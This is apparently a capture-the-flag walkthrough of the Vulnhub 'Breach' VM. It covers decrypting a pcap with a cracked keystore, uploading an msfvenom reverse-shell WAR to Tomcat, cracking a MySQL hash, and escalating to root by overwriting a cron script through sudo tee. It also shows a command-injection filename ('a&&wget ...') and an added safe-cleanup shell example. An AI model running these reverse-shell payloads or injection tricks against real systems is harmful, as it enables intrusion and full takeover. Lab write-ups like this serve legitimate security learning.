First we start with an nmap scan, but it took far too long to enumerate the host,
so I tried browsing to the IP, found a website there, and started nikto and dirb.
From checking the source code of the web application I found a strange string that looked like base64; it gave me a username and password to log in to ImpressCMS.
Decoding this string from base64 gives us
#TODO Where is the pcap located on the website
When I found the keystore I downloaded a tool to brute-force its password, because I needed the private key in a different format to be able to load it in Wireshark and decrypt the pcap.
While that was running I tried to be smart about it and ran strings on the keystore file, which revealed the word "tomcat", so I tried it as the password and it worked!
After finding that the password is tomcat, convert the JKS keystore to PKCS12 (the source keystore file name is not shown here):
keytool -importkeystore -srckeystore <keystore-file> -srcstoretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
Export the private key from the PKCS12 file and strip the passphrase:
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
Loading keyout.pem as an RSA key in Wireshark decrypts the pcap (this only works because the session used RSA key exchange rather than an ephemeral Diffie-Hellman suite, which would give forward secrecy).
After searching a LONG time for how to connect to the Tomcat service (Firefox doesn't work, and neither does netcat), I found out you can do it with openssl:
openssl s_client -connect 192.168.110.140:8443
After debugging openssl for hours I decided to try a browser other than Firefox, and I was able to reach the Tomcat server with Edge!
We can log in with the credentials found in the pcap.
Because we are an admin of Tomcat, we can upload a malicious WAR file:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see the name of the JSP to call
nc -lvp 443
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf -o breachmeter.elf
While enumerating the system I found there isn't a root password for MySQL, so I dumped all the databases and found the MD5 hash for the user milton.
Submitting this hash to CrackStation revealed that the password is thelaststraw.
Checking the logs on this server revealed:
Jul 5 06:39:01 Breach CRON: (root) CMD (/usr/share/cleanup/tidyup.sh)
After trying to inject bash commands into the script (because I control the destination directory), I found a way to bypass the script so it doesn't delete my file, because it doesn't handle spaces in file names.
I tried injecting a command with a filename like a&&wget 192.168.110.110, so the command passed to the shell would be
rm -rf swingline/a&&wget 192.168.110.110, which would execute the command.
I banged my head for about two days trying to exploit via this method.
I found something useful on the internet on how to inject arguments without spaces.
Even this didn't work, so I did what I had learned best while doing my OSCP: Try Harder! (If you are stuck somewhere, restart your enumeration from scratch.)
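The cleanup job above is the classic case of a root cron script deleting files from a directory a low-privileged user controls, so file names must be treated as data and never re-parsed by a shell. The following is an added example of how such a cleanup should be written, not the VM's actual tidyup.sh (whose contents are not shown here); the directory name SWINGLINE_DIR and the sample files created by make_demo_dir are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: a cron cleanup that survives hostile file names.
# The risky pattern is building "rm -rf swingline/$name" as a string and
# letting a shell re-parse it. find -exec passes each path as its own argv
# element to rm, so spaces, "&&", ";" or a leading "-" never reach a shell.

# Hypothetical directory; on the page the cron job cleans "swingline".
SWINGLINE_DIR="${SWINGLINE_DIR:-/tmp/swingline-demo}"

# tidyup_safe DIR: remove every entry directly under DIR, whatever its name.
tidyup_safe() {
    dir=$1
    [ -d "$dir" ] || return 1
    # -mindepth 1 -maxdepth 1: the entries, not DIR itself.
    # -- : rm stops option parsing, so an entry named "-rf" is just a file.
    find "$dir" -mindepth 1 -maxdepth 1 -exec rm -rf -- {} +
}

# count_entries DIR: number of entries directly under DIR (for checking).
count_entries() {
    find "$1" -mindepth 1 -maxdepth 1 | wc -l | tr -d ' '
}

# make_demo_dir DIR: constructed sample input with names that would be
# dangerous if a script ever handed them to a shell as text.
make_demo_dir() {
    rm -rf -- "$1"
    mkdir -p -- "$1"
    : > "$1/plain.txt"
    : > "$1/file with spaces.txt"
    : > "$1/a&&touch tidyup_demo_marker"   # would run a command if re-parsed
    : > "$1/-rf"                           # would look like an option without --
    mkdir -p -- "$1/sub dir"
}
```

Running tidyup_safe on the demo directory empties it and creates no tidyup_demo_marker file, which is exactly the property the page's injection attempts were probing for.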
While restarting my enumeration I came across a comment in one of the images of the website while running exiftool on it.
It had the comment "coffeestains".
From my earlier enumeration I knew there was another user on the system who didn't seem to interact with it (no trace of him in the logs and nothing in his home directory); his name is blumbergh. I had already tried some basic passwords on the account, but this time I tried with the new information.
su blumbergh # password: coffeestains
I was in!
Since I thought he was the server administrator (he wouldn't need to write anything in his home directory if he can be root), I checked sudo -l:
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
Okay, we don't have full sudo privileges, but we can modify tidyup.sh, which root runs from cron!
cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh
From here we just wait for a connection to our Metasploit handler:
set payload linux/x86/meterpreter/reverse_tcp
We then get a shell as root! Finally 🙂
root@Breach:/root# cat .flag.txt
[ASCII-art banner from .flag.txt]
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!
Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.